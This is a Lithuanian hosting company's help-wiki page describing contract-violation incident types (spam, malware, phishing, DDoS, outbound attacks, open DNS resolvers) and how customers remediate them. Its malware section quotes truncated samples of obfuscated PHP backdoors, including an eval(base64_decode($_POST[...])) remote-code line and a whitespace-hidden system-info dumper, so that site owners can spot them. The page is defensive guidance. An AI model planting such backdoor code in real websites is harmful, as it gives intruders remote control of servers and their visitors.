Sutarties sąlygų pažeidimai: Skirtumas tarp puslapio versijų

Iš IV pagalba klientams.
Peršokti į: navigacija, paiešką
215 eilutė: 215 eilutė:
  
 
[[category:Talpinimo problemų sprendimas]]
 
[[category:Talpinimo problemų sprendimas]]
[[category:į_pradžią]]
+
[[Kategorija:Sutartys, sąskaitos, mokėjimai]]

09:37, 18 rugsėjo 2019 versija

Kas tai yra?

Kiekvienas mūsų įmonės klientas, užsakydamas paslaugas privalo patvirtinti, kad sutinka su sutarties sąlygomis. Šios taisyklės apibrėžia Vykdytojo (mūsų) ir Užsakovo (kliento) teises, pareigas bei atsakomybes sudarant ir vykdant sutartį. Užsakovui pažeidus bent vieną sutarties sąlygą yra fiksuojamas pažeidimas, suteikiant ribotą laikotarpį pažeidimo priežastims pašalinti ir imtis visų įmanomų priemonių, kad tokia situacija nepasikartotų ateityje. Problemos šalinimo laikotarpis priklauso nuo pažeidimo tipo ir veiklos vykdymo mąsto, bendru atveju nuo vienos iki septynių dienų.

Pažeidimai dažniausiai yra fiksuojami dėl žalingos, neteisėtos veiklos vykdymo mūsų teikiamose paslaugose, gavus skundą iš trečiųjų šalių į tam skirtą el. pašto dėžutę abuse@iv.lt arba remiantis serverių tarnybų išrašais, patvirtinančiais kenkėjiškos veiklos vykdymo aplinkybes. Incidentas gali būti fiksuojamas, tik esant įrodymams ir/arba skundui apie sutarties sąlygų nesilaikymą.

Kokių tipų būna pažeidimai?

  • SPAM - incidentai, susiję su nepageidaujamų el. laiškų siuntimu per mūsų serverius arba netiesiogiai dalyvaujant SPAM veikloje, t.y. el. laiškuose reklamuojant mūsų serveriuose talpinamas svetaines ar el. pašto adresus. Pastaruoju atveju el. laiškų siuntimas gali būti vykdomas per trečiųjų šalių serverius, tačiau laiško turinyje ir/ar antraštėse bus aptinkamas domenas. Prie šių pažeidimų yra priskiriami ir atvejai, kai nesusaugojus el. pašto dėžučių prisijungimo duomenų, prieiga prie dėžučių yra suteikiama trečiosioms šalims.
  • MALWARE - šie atvejai yra susiję su žalingu programiniu kodu, kuris į klientų svetaines buvo įkeltas atspėjus ar nutekinus FTP prisijungimo duomenis, arba pasinaudojus svetainės programiniame kode esančiomis saugumo spragomis. Pastaruoju atveju dažniausiai svetainės nulaužimo priežastimi tampa laiku neatnaujinama programinė įranga (turinio valdymo sistemos, papildomai įdiegti įskiepiai ir dizaino temos). Žalingas programinis kodas gali atlikti įvairius veiksmus - svetainės lankytojus peradresuoti į kitus išorinius puslapius, programiniu būdu siųsti SPAM tipo pranešimus, užkrėsti lankytojų kompiuterius žalinga programine įranga ir pan.
  • PHISHING - pažeidimo tipas, kuomet apgaulės būdu yra renkami lankytojų prisijungimo duomenys. Dažniausiai šiam tikslui yra sukuriami atskiri svetainės puslapiai, klaidinančiai panašūs į kitas oficialias bankų, atsiskaitymo sistemų, socialinių tinklų ir pan. svetaines. Nuorodos į tokius puslapius gali būti išplatintos el. paštu, forumuose, kitose svetainėse.
  • ABUSE - daugiau bendro pobūdžio pažeidimų tipas, kuris fiksuojamas gavus skundą dėl nepageidaujamo, autorines teises pažeidžiančio turinio svetainėse, nelegalaus "Facebook" "Like" rinkimo, suteiktų serverio resursų viršijimo arba neproporcingo naudojimo, kai tai įtakoja bendro serverio ar mazgo stabilumą.
  • DDOS - šie pažeidimai fiksuojami, kuomet į kliento svetainę ar serverį yra nukreipta DDoS tipo ataka, t.y. siunčiamas ypač didelis kiekis įvairių užklausų iš skirtingų įrenginių, siekiant sutrikdyti svetainės ar serverio veikimą. Dažniausiai dėl atakos mąsto yra sutrikdomas ir kitų svetainių (bendro naudojimo serveriuose) ar serverių (bendrame mazge arba net duomenų centre) veikimas, todėl fiksavus incidentą, neretai yra priimamas sprendimas laikinai išjungti atakuojamą svetainę (serverį) arba apriboti užsienio duomenų srauto pralaidumą.
  • ATTACK - incidentai, kurių metu iš mūsų serveriuose talpinamų svetainių yra vykdomos atakos į išorines svetaines ar serverius. Tam gali būti pasitelkiamas serveryje įkeltas programinis kodas, kuriam instrukcijos yra perduodamos nuotoliniu būdu.
  • OPENRESOLVER - specifinis pažeidimo tipas, susijęs su saugumo spraga, esančia dedikuotų (savarankiškai administruojamų) serverių DNS tarnybose.

Kaip reaguoti gavus pranešimą apie fiksuotą pažeidimą?

Apie fiksuotą sutarties sąlygų pažeidimą klientas visada yra informuojamas kontaktiniu el. paštu, taip pat SMS pranešimu į mobilųjį telefoną. Pažeidimo šalinimas susideda iš kelių esminių etapų - labai svarbu:

  • prisijungti į klientų sistemą ir susipažinti su visa pateikta informacija apie incidentą - tai gali būti serverio tarnybos išrašas, gauto skundo el. paštu tekstas, kita susijusi ir pažeidimą įrodanti informacija. Taip pat labai svarbu atkreipti dėmesį į datą, iki kurios būtina pateikti atsakymą į pažeidimą. Jeigu iki termino pabaigos atsakymas nėra gaunamas, paslauga yra išjungiama.
  • pagal visą matomą informaciją atlikti veiksmus, kad pažeidimo priežastis būtų pašalinta per trumpiausią įmanomą laikotarpį ir tuo pačiu užkirsti kelią, kad situacija nepasikartotų ateityje.
  • klientų sistemoje būtina atsakyti į pažeidimą, informuojant apie atliktus veiksmus (tiksliai juos įvardinant).
  • sulaukus el. laiško apie pažeidimo atnaujinimą, visada svarbu patikrinti, ar pažeidimus administruojantis specialistas (mūsų įmonės darbuotojas) nepaprašė patikslinti daugiau detalių apie problemą, taip pat ar nepaprašė atlikti papildomų veiksmų. Būtina atkreipti dėmesį į visus klausimus ir pastabas, kurie fiksuojami klientų sistemos pažeidimų skiltyje.

SVARBU: sutarties sąlygų pažeidimai yra sprendžiami tik klientų sistemoje, tam skirtoje skiltyje. Su pažeidimu susijusiais klausimais galima konsultuotis tik minėtoje skiltyje - informacija apie pažeidimus nėra teikiama bendruoju įmonės telefonu, taip pat el. paštu. Iškilus neaiškumams, pritrūkus informacijos apie problemos šalinimą - visada galite atsakyti į pažeidimą ir rūpimus klausimus užduoti pažeidimus administruojančiam darbuotojui.

Kodėl buvo fiksuotas pažeidimas, jeigu jokių kenkėjiškų veiksmų neatlikau?

Pagal sutartinius įsipareigojimus, kiekvienas mūsų įmonės klientas turi saugoti jam suteiktus prisijungimo duomenis, taip pat užkirsti kelią suteiktais serverių resursais naudotis trečiosioms šalims. Kai kuriais atvejais pažeidimas gali atsirasti:

  • trečiosioms šalims atspėjus arba nutekinus (pvz.: kompiuterinio viruso pagalba) prisijungimo duomenis (serverio valdymo pulto, FTP, el. pašto dėžutės...);
  • serveryje talpinant iš neoficialių šaltinių parsisiųstą programinę įrangą (turinio valdymo sistemas, dizaino temas, įskiepius, aplikacijas ir pan.);
  • laiku neatnaujinant talpinamos programinės įrangos versijos į vėliausią (su naujausiai atrastų saugumo spragų pataisymais);
  • nepasirūpinus naudojamų įrenginių (kompiuterių, išmaniųjų telefonų, planšetinių kompiuterių...) saugumu, reguliariai jų nepatikrinus antivirusinėmis programomis;

Visais šiais atvejais pažeidimo priežastis privalo pašalinti paslaugos užsakovas arba jo įpareigotas IT specialistas. Prieš šalinant pažeidimo priežastis, galite peržiūrėti mūsų pateikiamas rekomendacijas ir pastabas.

Rekomendacijos ir pastabos

SPAM

1. Visų pirma įdėmiai peržiūrėkite klientų sistemos pažeidimų skiltyje pateiktą informaciją (laiško pavyzdį, el. pašto tarnybos išrašą) ir nustatykite, ar matoma informacija yra susijusi su Jūsų iniciatyva siunčiamais el. laiškais - ar matytas el. laiško tekstas, ar Jums yra žinomas gavėjo el. pašto adresas ir pan. Jeigu laiškas iš ties buvo siųstas Jūsų iniciatyva arba su Jūsų žinia platinant reklaminio/komercinio pobūdžio informaciją - peržiūrėkite, kas yra laikoma nepageidaujamais (SPAM) laiškais.

2. Jeigu pagal pateiktą informaciją el. laiškai nebuvo siunčiami su Jūsų žinia, galbūt net paskutiniu metu į el. pašto dėžutę gavote nemažą kiekį informacinių pranešimų apie pastebėtą nesaugų laiškų siuntimą - didelė tikimybė, kad Jūsų el. pašto dėžutės slaptažodis yra atspėtas arba nutekintas (pvz.: kompiuterinio viruso pagalba). Šiuo atveju turėtumėte kiek įmanoma greičiau pakeisti atitinkamos dėžutės slaptažodį į kiek įmanoma sudėtingesnį, taip pat nuskenuoti visus įrenginius (kuriuose buvo naudojama el. pašto dėžutė) antivirusinėmis programomis. Atkreipkite dėmesį ir į išmaniuosius įrenginius (telefonus, planšetinius kompiuterius).

3. Jeigu klientų sistemos pažeidimų skiltyje pateiktoje informacijoje yra nurodoma (vietoje mano-svetaine.lt - Jūsų svetainės adresas):

Spamvertised web site: http://mano-svetaine.lt/

vadinasi el. laiškas buvo siunčiamas per kitą serverį, tačiau laiško turinyje buvo reklamuojamas Jūsų svetainės adresas. Tokiais atvejais mūsų teikiamos serverių paslaugos taip pat yra įtraukiamos į SPAM pranešimų platinimo veiklą. Vykdomą el. laiškų siuntimą turėtumėte kiek įmanoma greičiau nutraukti, taip pat pasirūpinkite, kad siunčiami laiškai nebūtų laikomi nepageidaujamais arba tokio pobūdžio pranešimus siųskite neįtraukdami į šią veiklą mūsų teikiamų serverio resursų (nei vienas laiške randamas domenas neturėtų būti nukreiptas į mūsų serverius).

4. Jeigu masinis el. laiškų siuntimas yra vykdomas iš sisteminės el. pašto dėžutės - tuomet tikėtina kad SPAM tipo el. laiškai yra siunčiami programiniu būdu iš svetainės. Tam gali būti pasitelkiamos neapsaugotos užklausų formos, skirtos greitam el. laiško suformavimui ir išsiuntimui tiesiogiai svetainėje. Šiuo atveju prie kiekvienos užklausos formos rekomenduojame įdiegti teksto atpažinimo iš nuotraukos tipo apsaugą (pvz.: Captcha, reCaptcha).

5. Kilus įtarimui apie nesankcionuotą trečiųjų šalių prisijungimą prie Jūsų el. pašto dėžutės (-čių), rekomenduojame patikrinti el. pašto statistiką.

MALWARE

1. Jeigu turite galimybę, patikrinkite serverio FTP tarnybos išrašą - jame matysite failų įkėlimo/parsisiuntimo atvejus, fiksuojant tikslų laiką ir IP adresą, iš kurio buvo prisijungta. Fiksuotą (-us) IP adresą (-us) galite palyginti su savo kompiuterio išoriniu IP adresu, kurį išvysite apsilankius adresu ip.serveriai.lt. Jeigu IP adresai yra skirtingi - didelė tikimybė kad prie FTP serverio su atspėtu arba nutekintu (pvz.: kompiuterinio viruso pagalba) slaptažodžiu buvo prisijungta kitų asmenų. Tokiu atveju kiek įmanoma greičiau pakeiskite FTP naudotojo slaptažodį ir nuskenuokite visus naudojamus įrenginius (iš kurių buvo jungtasi į serverį) antivirusinėmis programomis.

Serveriai.lt talpinimo planų FTP išrašo tikrinimo instrukciją galite rasti paspaudę čia.

2. Jeigu Jūsų svetainėje yra naudojama atvirojo kodo turinio valdymo sistema (pvz.: Joomla, Wordpress, Drupal...), el. komercijos platforma (pvz.: PrestaShop, Magento, OpenCart...), forumo sistema (pvz.: phpBB...) ar kita nemokama programinė įranga - atnaujinkite šių sistemų versijas į naujausias. Tą patį padarykite su papildomai įdiegtais įskiepiais (angl. plugins), moduliais (angl. modules) ir dizaino temomis (angl. templates). Atnaujinimas gali būti atliekamas automatiškai (prisijungus į svetainės administracinę panelę), arba rankiniu būdu (pagal instrukcijas, programinės įrangos kūrėjo svetainėje).

3. Jeigu Jūsų svetainė yra sukurta Joomla turinio valdymo sistemos pagrindu ir joje buvo papildomai įdiegtas JCE modulis, būtinai atnaujinkite jo versiją į naujausią - šio Joomla sistemai skirto tekstų redaktoriaus senesnėse versijose yra aptikta grubių saugumo spragų. Detalias modulio atnaujinimo instrukcijas galite rasti paspaudę šią nuorodą.

4. Saugumo sumetimais pakeiskite serverio (valdymo pulto, FTP, phpMyAdmin įrankio) prisijungimo duomenis - jeigu esami prisijungimo duomenys yra pamiršti, juos galite sugeneruoti iš naujo klientų sistemoje.

5. Jeigu svetainių failams ir katalogams esate nustatę maksimalias prieigos teises (angl. permissions) 777 - tai taip pat galima įvardinti kaip saugumo grėsmę, kadangi duomenų įrašymo, nuskaitymo ir vykdymo galimybė yra suteikiama visiems naudotojams (ne tik serverio ir/ar svetainės administratoriui). Paprastai svetainės failams ir katalogams, kurie gali būti pasiekiami iš išorės (pvz.: "public_html" direktorijoje) nerekomenduojama nustatyti didesnių prieigos teisių nei 644 failams ir 755 direktorijoms.

6. Jeigu pastaruoju metu iš mūsų gavote el. laišką (-us) apie talpinimo paslaugoje aptiktus žalingus failus - peržiūrėkite visų sąraše nurodytų bylų turinį ir pašalinkite žalingą programinį kodą. Dažniausiai jį galima atpažinti, jeigu didžioji dalis fragmento yra koduota:

preg_replace("\x2F\x2E\x2A\x2F\x65","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X37d9s4zujP3XP2f2A12ZHdOn6l6Xbi2H3k0abTJp0kfSa5XtmWbU1kySPJcdJu/vcLgA+Rkuy4ndn97j3nS2cSSQRBkARJEARAtz8OmbXte8Eli1y/bcfjMEr6s4R5/TCw2Thyh217nCTTrVptPp9XB1/X4yRynYkXjKrurDZ0rhCyCr/szt//x <...>

eilutės pradžioje yra didelis kiekis tarpo simbolių, kad daugumoje redaktorių žalingas kodas nebūtų iškart matomas po failo atidarymo:

<?php                                                                                   error_reporting(0);if(isset($_GET["gdtld"])){echo"[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo <...>

naudojamos eval, base64_decode, zlib_decode funkcijos:

eval(base64_decode($_POST["\x63od\x65"]));}if(isset($_POST["\x74\x79pe"])&&$_POST["type"]=="\x31"){type1_send();}elseif(isset($_POST["type"])&&$_POST["t\x79\x70e"]=="2"){}elseif(isset($_POST["\x74\x79pe"]))

Esant poreikiui, talpinimo paslaugos failus galime nuskenuoti pakartotinai - tereikia apie tai informuoti atsakant į pažeidimą klientų sistemoje.

SVARBU: prieš atliekant failų korekcijas, rekomenduojame išsisaugoti atsarginę duomenų kopiją - per klaidą pašalinus iš failų ne vien tik žalingą kodą, gali sutrikti svetainės veikimas. Tokiu atveju svarbių bylų turinį būtų galima perkopijuoti iš duomenų kopijos.

7. Jeigu šalinant žalingą programinį kodą ištrynėte reikalingus svetainei duomenis (failus ar direktorijas), galite užsakyti duomenų atstatymą iš mūsų generuojamų atsarginių kopijų.

PHISHING

1. Visų pirma įdėmiai peržiūrėkite visą klientų sistemoje pateiktą informaciją - joje bus nurodomas tikslus svetainės puslapis ar sritis, kurioje yra patalpinta apgaulinga kitos svetainės kopija. Tokio pobūdžio puslapių serveryje gali būti sukurta ir daugiau, todėl peržiūrėkite visus serverio failus iš esmės ir pašalinkite visas nepageidaujamas, trečiųjų šalių įkeltas bylas.

2. Jeigu Jūsų svetainėje yra naudojama atvirojo kodo turinio valdymo sistema (pvz.: Joomla, Wordpress, Drupal...), el. komercijos platforma (pvz.: PrestaShop, Magento, OpenCart...), forumo sistema (pvz.: phpBB...) ar kita nemokama programinė įranga - atnaujinkite šių sistemų versijas į naujausias. Tą patį padarykite su papildomai įdiegtais įskiepiais (angl. plugins), moduliais (angl. modules) ir dizaino temomis (angl. templates). Atnaujinimas gali būti atliekamas automatiškai (prisijungus į svetainės administracinę panelę), arba rankiniu būdu (pagal instrukcijas, programinės įrangos kūrėjo svetainėje).

3. Saugumo sumetimais pakeiskite serverio (valdymo pulto, FTP, phpMyAdmin įrankio) prisijungimo duomenis - jeigu esami prisijungimo duomenys yra pamiršti, juos galite sugeneruoti iš naujo klientų sistemoje.

4. Jeigu svetainių failams ir katalogams esate nustatę maksimalias prieigos teises (angl. permissions) 777 - tai taip pat galima įvardinti kaip saugumo grėsmę, kadangi duomenų įrašymo, nuskaitymo ir vykdymo galimybė yra suteikiama visiems naudotojams (ne tik serverio ir/ar svetainės administratoriui). Paprastai svetainės failams ir katalogams, kurie gali būti pasiekiami iš išorės (pvz.: "public_html" direktorijoje) nerekomenduojama nustatyti didesnių prieigos teisių nei 644 failams ir 755 direktorijoms.

ABUSE

Jeigu sutarties sąlygų pažeidimas buvo fiksuotas serveriai.lt talpinimo plane dėl neproporcingai išnaudojamų serverio resursų (pvz.: svetainė išnaudoja visus leistinus susijungimus, talpinamos MySQL duomenų bazės dydis viršija 1 GB, arba lentelių kiekis duomenų bazėje yra ypač didelis) rekomenduojame apsvarstyti galimybę persikelti į profesionalaus hostingo paslaugą. Serveriai.lt paslaugos veikia shared-hostingo principu, kuomet vieno fizinio serverio resursais naudojasi didesnis kiekis naudotojų. Dėl šios priežasties, bendro naudojimo serveriuose negali būti talpinamos svetainės, naudojančios serverio resursus neproporcingai (įtakojančios kitų klientų svetainių veikimą bendrame serveryje).

DDOS

Atakuojamai svetainei (ir visoms kitoms, talpinamoms tame pačiame serveryje) rekomenduojame įjungti CloudFlare arba Incapsula papildomą užklausų filtravimo paslaugą. Detalią CloudFlare apsaugos pajungimo instrukciją galite rasti paspaudę čia.

ATTACK

1. Visų pirma įdėmiai peržiūrėkite visą klientų sistemoje pateiktą informaciją - kai kuriais atvejais iš jos galima nustatyti, kokie serverio failai yra naudojami instrukcijų perdavimui nuotoliniu būdu ir atakos vykdymui prieš kitas svetaines ar serverius. Jeigu pateikiamos informacijos kiekis yra per mažas - peržiūrėkite į serverį įkeltus vėliausius failus, taip pat patikrinkite Apache tarnybos išrašus arba aktyvius serverio susijungimus (dedikuotame serveryje). Identifikavus atakos vykdyme dalyvaujančius failus, kiek įmanoma greičiau juos pašalinkite iš serverio.

2. Jeigu Jūsų svetainėje yra naudojama atvirojo kodo turinio valdymo sistema (pvz.: Joomla, Wordpress, Drupal...), el. komercijos platforma (pvz.: PrestaShop, Magento, OpenCart...), forumo sistema (pvz.: phpBB...) ar kita nemokama programinė įranga - atnaujinkite šių sistemų versijas į naujausias. Tą patį padarykite su papildomai įdiegtais įskiepiais (angl. plugins), moduliais (angl. modules) ir dizaino temomis (angl. templates). Atnaujinimas gali būti atliekamas automatiškai (prisijungus į svetainės administracinę panelę), arba rankiniu būdu (pagal instrukcijas, programinės įrangos kūrėjo svetainėje).

3. Saugumo sumetimais pakeiskite serverio (valdymo pulto, FTP, phpMyAdmin įrankio) prisijungimo duomenis - jeigu esami prisijungimo duomenys yra pamiršti, juos galite sugeneruoti iš naujo klientų sistemoje.

4. Jeigu svetainių failams ir katalogams esate nustatę maksimalias prieigos teises (angl. permissions) 777 - tai taip pat galima įvardinti kaip saugumo grėsmę, kadangi duomenų įrašymo, nuskaitymo ir vykdymo galimybė yra suteikiama visiems naudotojams (ne tik serverio ir/ar svetainės administratoriui). Paprastai svetainės failams ir katalogams, kurie gali būti pasiekiami iš išorės (pvz.: "public_html" direktorijoje) nerekomenduojama nustatyti didesnių prieigos teisių nei 644 failams ir 755 direktorijoms.

OPENRESOLVER

Šio pažeidimo pašalinimui turėtumėte DNS serverio nustatymus pakeisti taip, jog būtų pateikiami atsakymai tik toms zonoms, kurios yra aprašytos DNS serveryje. Jeigu Jūsų serveryje naudojamas "BIND" DNS serveris su tipine konfigūracija, reikia faile "/etc/named.conf" skiltyje "options" pridėti eilutę:

allow-recursion { 127.0.0.1; };

Konfigūracinio failo "/etc/named.conf" vieta gali skirtis priklausomai nuo Jūsų serverio konfigūracijos. Išsaugojus pakeitimus būtinai perkraukite DNS tarnybą.


Ką daryti, jei į svetainę buvo įterpti žalingi failai/kenkėjiškas kodas?

Jei į Jūsų svetainę buvo įterpti žalingi failai ar kenkėjiškas kodas, rekomenduojame atlikti šiuos veiksmus:

  • Apribokite prieigą prie savo svetainės, svetainės .htaccess faile (public_html kataloge) sukurdami blokavimo taisyklę, kuri leis prie svetainės prisijungti tik iš Jūsų IP adreso: https://www.iv.lt/pagalba/Prieigos_blokavimas

Savo išorinį IP adresą galite matyti apsilankę adresu: http://ip.serveriai.lt/

  • Parsisiųskite visus savo svetainės failus į kompiuterį (patogiausia tai atlikti prisijungus prie serverio per FTP) ir praskenuokite juos. Ne visos antivirusinės programos skenuoja svetaines ir aptinka kenkėjišką kodą vienodai (antivirusinės programos gali nekorektiškai skenuoti PHP skriptus).
  • Pašalinus žalingus failus svetainės failuose, įkelkite juos atgal į serverį. Atnaujinkite naudojamas turinio valdymo sistemas ir modulius.
  • Nenaudokite nesaugių, senų ir neatnaujinamų įskiepių (angl. plugins).
  • Nuolat atnaujinkite naudojamas turinio valdymo sistemas iki naujausios versijos.
  • Atkreipkite dėmesį į turinio valdymo sistemų tiekėjų rekomendacijas svetainių apsaugojimui.
  • Atblokavus svetainę .htaccess faile (pašalinus anksčiau sukurtą blokavimo taisyklę), ją galite praskenuoti šiais viešai prieinamais įrankiais:

https://sitecheck.sucuri.net/
https://www.virustotal.com/